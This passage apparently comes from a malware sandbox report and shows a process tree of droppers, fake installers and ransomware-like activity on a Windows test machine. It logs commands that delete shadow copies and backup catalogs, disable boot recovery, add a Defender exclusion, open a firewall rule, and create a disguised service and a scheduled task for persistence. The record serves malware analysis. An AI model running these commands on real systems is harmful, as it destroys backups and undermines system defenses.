                                                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:5924
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-M9EIJ.tmp\MediaBurner2.tmp
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-M9EIJ.tmp\MediaBurner2.tmp" /SL5="$30368,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:5316
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-GO31J.tmp\ultradumnibour.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-GO31J.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:6044
                                                                                                                                                                                                                                                      • C:\Program Files\Uninstall Information\KEGHIABFFS\ultramediaburner.exe
                                                                                                                                                                                                                                                        "C:\Program Files\Uninstall Information\KEGHIABFFS\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:8148
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-TQBAN.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-TQBAN.tmp\ultramediaburner.tmp" /SL5="$402E4,281924,62464,C:\Program Files\Uninstall Information\KEGHIABFFS\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                              PID:7152
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                  PID:7640
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\49-14ee8-70d-2b0b5-cfb8d23d53a74\Kaepowygaeto.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\49-14ee8-70d-2b0b5-cfb8d23d53a74\Kaepowygaeto.exe"
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:7140
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\f8-c3558-2a7-399aa-ab31cd7b31afa\Howiwafaecu.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\f8-c3558-2a7-399aa-ab31cd7b31afa\Howiwafaecu.exe"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:4216
                                                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                                    dw20.exe -x -s 704
                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                      PID:7312
                                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:5800
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                    PID:5932
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\gD2Wa3d8OfEdWgVPMtbiMaeH.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\gD2Wa3d8OfEdWgVPMtbiMaeH.exe"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:4072
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\GD2WA3~1.DLL,s C:\Users\Admin\DOCUME~1\GD2WA3~1.EXE
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:6952
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                                                                                  C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GD2WA3~1.DLL,gi9TNW5iMnJl
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:4884
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\GD2WA3~1.DLL
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:8844
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                                                                                        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GD2WA3~1.DLL,HgoTaDJCS0Y=
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:2364
                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:2188
                                                                                                                                                                                                                                                                              • C:\Windows\system32\ctfmon.exe
                                                                                                                                                                                                                                                                                ctfmon.exe
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:9048
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp6EE4.tmp.ps1"
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:6804
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:4604
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                                                                                                                                                            WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:64
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:4544
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:5412
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:5912
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                  taskkill -IM "yuOMwcQFh1wquc52IaH03wkF.exe" -f
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                  PID:4688
                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                PID:5992
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:5512
                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:3744
                                                                                                                                                                                                                                                                                  • C:\ProgramData\jeqpu\bagetu.exe
                                                                                                                                                                                                                                                                                    C:\ProgramData\jeqpu\bagetu.exe start
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:7988
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:5272
                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding A1EE5E636B4BB016C3CF1EFD27D5114F C
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:6052
                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 2EF6AD14C981A2B26C9DE2A3166031C6
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:5076
                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 1EC328776C23B53E4F093F2BAF1966DD C
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:8408
                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding F625CAB07B40E4445FA1063A73BCA1A0 C
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:9020
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                PID:9004
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:9028
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 9028 -s 624
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      PID:9108
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C9D5.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\C9D5.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:6424
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DB89.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\DB89.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:5152
                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:7628
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                          DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{045f237e-a524-7344-a4b1-51621a78ef66}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:8076
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:5648
                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:632
                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:5688
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\39.exe
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\39.exe
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:6024
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\914.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\914.exe
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:8492
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\cjxnpmss\
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:8920
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\kcltqdpj.exe" C:\Windows\SysWOW64\cjxnpmss\
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:7780
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\sc.exe" create cjxnpmss binPath= "C:\Windows\SysWOW64\cjxnpmss\kcltqdpj.exe /d\"C:\Users\Admin\AppData\Local\Temp\914.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:6820
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" description cjxnpmss "wifi internet conection"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:4236
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" start cjxnpmss
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:8076
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:9044
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\iifaduld.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\iifaduld.exe" /d"C:\Users\Admin\AppData\Local\Temp\914.exe"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:2648
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\sspknevn.exe" C:\Windows\SysWOW64\cjxnpmss\
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:8036
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" config cjxnpmss binPath= "C:\Windows\SysWOW64\cjxnpmss\sspknevn.exe /d\"C:\Users\Admin\iifaduld.exe\""
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:8904
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\sc.exe" start cjxnpmss
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:5412
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:8664
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5277.bat" "
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:6844
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2131.exe
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2131.exe
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:5596
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2C5D.exe
                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\2C5D.exe
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:8312
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4CE6.exe
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\4CE6.exe
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6588
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\55C1.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\55C1.exe
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5644
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:9148
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 0
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:5744
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:3012
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:632
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                  vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                  PID:10412
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                PID:4868
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                  vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                  PID:9656
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:7404
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6924
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5844
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:2276
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                          wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:9664
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                                                          notepad.exe
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:10900
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                                                          notepad.exe
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5788
                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:7240
                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                              MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:9332
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BAF4.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\BAF4.exe
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6824
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\Update.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\Update.exe"
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:4328
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Red1_.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:6492
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Clip_.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:3664
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:6712
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:9888
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                  PID:10020
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:9036
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
